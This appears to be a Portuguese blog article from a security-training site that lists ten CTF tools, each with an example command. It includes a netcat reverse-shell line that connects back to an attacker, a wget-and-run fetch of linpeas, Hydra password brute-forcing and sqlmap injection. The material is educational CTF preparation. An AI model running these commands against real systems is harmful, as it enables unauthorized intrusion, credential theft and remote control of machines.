
10 Ferramentas Úteis (Hacker) para CTF
Se você gosta de desafios de CTF (Capture The Flag) ou quer aprimorar suas habilidades em segurança ofensiva, conhecer as ferramentas certas pode fazer toda a diferença. Neste artigo, reunimos 10 ferramentas essenciais para CTF, amplamente utilizadas por hackers éticos e entusiastas de cibersegurança para exploração de vulnerabilidades, reconhecimento, fuzzing e escalonamento de privilégios.
Desde scanners de portas até ferramentas de força bruta, cada uma dessas soluções pode ser um trunfo no seu arsenal para capturar flags com mais eficiência. Vamos conferir!
10 Ferramentas Úteis (Hacker) para CTF
1. Nmap 📡 (Escaneamento de portas e serviços)
- Detecta portas abertas e serviços rodando no alvo.
- Comando: nmap -A -p- <IP>
2. Gobuster 📂 (Força bruta em diretórios)
- Descobre diretórios e arquivos ocultos no servidor web.
- Comando: gobuster dir -u http://<IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
3. Nikto 🔍 (Scanner de vulnerabilidades web)
- Identifica falhas conhecidas em servidores web.
- Comando: nikto -h http://<IP>
4. SQLmap 🛠 (Testes de SQL Injection)
- Automatiza exploração de falhas SQLi.
- Comando: sqlmap -u “http://<IP>/vulnerable.php?id=1” –dbs
5. WFuzz 🕵️♂️ (Fuzzing de parâmetros web)
- Descobre entradas ocultas em formulários e URLs.
- Comando: wfuzz -c -z file,wordlist.txt –hc 404 http://<IP>/FUZZ
6. Hydra 🔑 (Ataques de força bruta)
- Testa senhas em serviços como SSH e HTTP login.
- Comando: hydra -l admin -P rockyou.txt <IP> http-post-form “/login.php:user=^USER^&pass=^PASS^:F=incorrect”
7. Linpeas 🖥 (Escalonamento de privilégios no Linux)
- Descobre vulnerabilidades para elevar privilégios.
- Comando: wget http://<IP>/linpeas.sh && chmod +x linpeas.sh && ./linpeas.sh
8. GTFOBins 📜 (Exploração de binários vulneráveis no Linux)
- Lista comandos que permitem escalonamento de privilégios.
- Uso: Pesquisar binários vulneráveis no site gtfobins.github.io
9. Netcat 🕳 (Shell reverso e comunicação entre máquinas)
- Cria conexões de rede para controle remoto.
- Comando:
- Escutar conexão: nc -lvnp 4444
- Conectar ao atacante: nc <IP> 4444 -e /bin/bash
10. John the Ripper 🔓 (Quebra de senhas)
- Testa senhas criptografadas contra wordlists.
- Comando: john –wordlist=rockyou.txt hash.txt
Confira também: 10 Ferramentas de Redes Úteis para CTF
Gostou do conteúdo? Se você deseja aprofundar mais seu conhecimento sobre cibersegurança, confira os cursos disponíveis da IBSEC.